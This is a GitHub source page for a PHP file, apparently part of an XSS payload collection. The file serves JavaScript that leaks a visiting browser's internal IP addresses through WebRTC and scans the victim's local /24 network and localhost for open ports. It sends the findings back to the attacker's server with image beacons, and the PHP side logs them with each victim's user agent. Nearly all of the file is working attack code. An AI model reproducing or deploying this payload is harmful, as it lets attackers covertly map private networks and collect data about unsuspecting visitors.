-
Notifications
You must be signed in to change notification settings - Fork 160
/
local_network_scan.php
169 lines (144 loc) · 5.72 KB
/
local_network_scan.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
<?php
// Get the user's INTERNAL IP address and then attempt to scan their local /24 network
// http://net.ipcalf.com/
// http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html
// Record submitted data. Make sure the web server can write this file
$logfile = "internal_scan.log";
// Log internal IP of the victim
if( !empty($_GET["internalips"]) ){
$line = "ADDR\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["internalips"];
$line .= "\t".$_SERVER["HTTP_USER_AGENT"]."\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Log an open port
if( !empty( $_GET['openport'] ) ){
$line = "PORT\t".$_SERVER['REMOTE_ADDR']."\t".$_GET["openport"];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
// Report complete
if( !empty( $_GET['scancomplete'] ) ){
$line = "DONE\t".$_SERVER['REMOTE_ADDR'];
if( !empty( $_GET['srcip'] ) ){
$line .= "\t".$_GET['srcip'];
}
$line .= "\t".$_SERVER["HTTP_USER_AGENT"];
$line .= "\n";
file_put_contents( $logfile, $line, FILE_APPEND );
exit;
}
header( "Content-type: text/javascript" );
$url = "//".$_SERVER["SERVER_ADDR"].$_SERVER["PHP_SELF"];
?>
function report( data ){
new Image().src = '<?php echo $url; ?>?'+data;
}
function ports_callback( host, port, state, srcip ){
if( state == "closed" ) return;
// console.log( host, port, state );
report( "openport=" + host + ":" + port + "&srcip=" + srcip );
}
var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.ports = '445,3389,80,443,3306,8080,1723,5900,1025,8888,199,1720,81,6001'.split(',')
AttackAPI.PortScanner.port_index = 0;
AttackAPI.PortScanner.host_num = 1;
AttackAPI.PortScanner.src = '';
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout, srcip ) {
var timeout = (timeout == null)?100:timeout;
var img = new Image();
// console.log( "Scanning " + target + ":" + port );
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open', srcip );
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img.src = 'http://localhost/icon.png';
img = undefined;
callback(target, port, 'closed', srcip );
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
var ports = (ports == null) ? AttackAPI.PortScanner.ports : ports;
var timeout = (timeout == null)?100:timeout;
for (index = 0; index < ports.length; index++)
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout, target );
};
// Scan a /24 around an IP
AttackAPI.PortScanner.scanNetwork = function ( callback, target )
{
if( target.toLowerCase() == 'udp' ) return;
a = target.split('.');
AttackAPI.PortScanner.scanPort( callback, a[0]+'.'+a[1]+'.'+a[2]+'.'+AttackAPI.PortScanner.host_num, AttackAPI.PortScanner.ports[AttackAPI.PortScanner.port_index], 100, target );
AttackAPI.PortScanner.host_num++;
if( AttackAPI.PortScanner.host_num >= 255 ){
AttackAPI.PortScanner.port_index++;
if( AttackAPI.PortScanner.port_index >= AttackAPI.PortScanner.ports.length ){
report( "scancomplete&srcip=" + target );
return;
}
AttackAPI.PortScanner.host_num = 1;
}
setTimeout( function(){
AttackAPI.PortScanner.scanNetwork( callback, target );
}, 200 );
};
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function () {
var rtc = new RTCPeerConnection({iceServers:[]});
if (1 || window.mozRTCPeerConnection) { // FF [and now Chrome!] needs a channel/stream to proceed
rtc.createDataChannel('', {reliable:false});
};
rtc.onicecandidate = function (evt) {
// convert the candidate to SDP so we can run it through our general parser
// see https://twitter.com/lancestout/status/525796175425720320 for details
if (evt.candidate) grepSDP("a="+evt.candidate.candidate);
};
rtc.createOffer(function (offerDesc) {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { console.warn("offer failed", e); });
var addrs = Object.create(null);
addrs["0.0.0.0"] = false;
function updateDisplay(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
displayAddrs = displayAddrs.filter(function(ip){ return ip.toString().trim().toLowerCase() != 'udp';});
report( "internalips=" + displayAddrs.join(',') || 'n/a' );
AttackAPI.PortScanner.scanTarget( ports_callback, '127.0.0.1' );
for( i=0; i<displayAddrs.length; i++ ){
AttackAPI.PortScanner.scanNetwork( ports_callback, displayAddrs[i] );
}
}
function grepSDP(sdp) {
var hosts = [];
sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
addr = parts[4],
type = parts[7];
if (type === 'host') updateDisplay(addr);
var parts = line.split(' '),
addr = parts[2];
updateDisplay(addr);
}
});
}
})(); else {
}